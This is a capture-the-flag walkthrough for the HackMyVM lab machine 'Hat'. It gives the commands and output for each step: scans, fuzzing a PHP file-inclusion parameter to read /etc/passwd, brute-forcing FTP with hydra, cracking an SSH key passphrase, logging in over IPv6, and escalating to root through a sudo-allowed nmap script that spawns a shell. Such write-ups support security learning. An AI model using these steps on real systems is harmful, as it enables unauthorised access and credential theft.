 22/tcp    filtered ssh
 80/tcp    open     http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 65535/tcp open     ftp     pyftpdlib 1.5.4
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |  Connected to: 192.168.56.100:65535
 |  Waiting for username.
 |  TYPE: ASCII; STRUcture: File; MODE: Stream
 |  Data connection closed.
 |_End of status.

Scan port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.html (Status: 200) [Size: 10701]
/logs (Status: 301) [Size: 315] [--> http://192.168.56.100/logs/]
/php-scripts (Status: 301) [Size: 322] [--> http://192.168.56.100/php-scripts/]

Scan php-scripts, found file.php.

 ```bash
~ gobuster dir -u http://192.168.56.100/php-scripts -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o scripts.log
 /index.html           (Status: 200) [Size: 7]
 /file.php             (Status: 200) [Size: 0]

Fuzz the param of file.php.

```bash
~ wfuzz -u 'http://192.168.56.100/php-scripts/file.php?FUZZ=/etc/passwd'; -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0

ID Response Lines Word Chars Payload

000000713: 200 26 L 38 W 1404 Ch "6"

Get user name.

 ```bash
~ curl 'http://192.168.56.100/php-scripts/file.php?6=/etc/passwd'      
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin            
 ...
 cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash

Scan folder logs. Get ftp user name from vsftpd.log

```bash
~ gobuster dir -u http://192.168.56.100/logs -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,log -b 401,403,404,500
--wildcard -o logs.log
...

/index.html (Status: 200) [Size: 4]
/vsftpd.log (Status: 200) [Size: 1834]

Bruteforce password of ftp.

```bash
 ~ hydra -l ftp_s3cr3t -P /usr/share/wordlists/rock_ascii.txt -e nsr 192.168.56.100 -s 65535  ftp -t64 -F           ...
 [65535][ftp] host: 192.168.56.100   login: ftp_s3cr3t   password: cowboy

Get 2 files: note and id_rsa.

~ cat note                                                                              

 Hi,

 We have successfully secured some of our most critical protocols ... no more worrying!

 Sysadmin

Port 22 is filtered. We can not connect it directly, but it is open. So let's try IPV6.

Modify /etc/sysctl.conf to enable IPv6. inet6 means IPv6 is enabled.

```bash
~ cat /etc/sysctl.conf
...
net.ipv6.conf.all.disable_ipv6 = 0
net.ipv6.conf.default.disable_ipv6 = 0
net.ipv6.conf.lo.disable_ipv6 = 0
~ ifconfig
...
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.150 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::ff1:d602:48fd:2485 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:35:d5:69 txqueuelen 1000 (Ethernet)
...

Find machines in local link IPv6 network.

 ```bash
~ ping6 -c2 -n -I eth1 ff02::1  
 ping6: Warning: source address might be selected on device other than: eth1
 PING ff02::1(ff02::1) from :: eth1: 56 data bytes
 64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=1 ttl=64 time=0.033 ms
 64 bytes from fe80::a00:27ff:fe17:10a4%eth1: icmp_seq=1 ttl=64 time=0.615 ms
 64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=2 ttl=64 time=0.049 ms

Test if the machine can be visited from ipv6 address.

```bash
~ nmap -p- fe80::a00:27ff:fe17:10a4%eth1 -6
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-13 15:23 CST
Nmap scan report for fe80::a00:27ff:fe17:10a4
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
~ curl 'http://[fe80::a00:27ff:fe17:10a4%eth1]/index.html';
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">;
<html xmlns="http://www.w3.org/1999/xhtml">;
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
...

Decrypt id_rsa.

 ```bash
$ python2 /usr/share/john/ssh2john.py id_rsa  > crack.txt
 $ john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
 Using default input encoding: UTF-8
 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
 Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
 Cost 2 (iteration count) is 2 for all loaded hashes
 Will run 2 OpenMP threads
 Note: This format may emit false positives, so it will keep trying even after
 finding a possible candidate.
 Press 'q' or Ctrl-C to abort, almost any other key for status
 ilovemyself      (id_rsa)
 1g 0:00:00:11 46.01% (ETA: 20:23:54) 0.09082g/s 607973p/s 607973c/s 607973C/s katim03..katilsimbu_1
 Session aborted

Login ssh through ipv6.

```bash
~ ssh cromiphi@fe80::a00:27ff:fe17:10a4%eth1 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux Hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth: file /home/cromiphi/.Xauthority does not exist
cromiphi@Hat:~$

Check sudo -l.

 ```bash
cromiphi@Hat:~$ sudo -l
 Matching Defaults entries for cromiphi on Hat:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User cromiphi may run the following commands on Hat:
     (root) NOPASSWD: /usr/bin/nmap

Get root.

```bash
cromiphi@Hat:~$ echo 'os.execute("/bin/bash -i")' > exp
cromiphi@Hat:~$ sudo nmap --script=exp
Starting Nmap 7.70 ( https://nmap.org ) at 2021-10-13 10:38 CEST
NSE: Warning: Loading 'exp' -- the recommended file extension is '.nse'.
root@Hat:/home/cromiphi# uid=0(root) gid=0(root) grupos=0(root)
Hat

HackMyVm Tranquil Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Tranquil

Key points: multi service on one port, gshadow.

继续阅读 →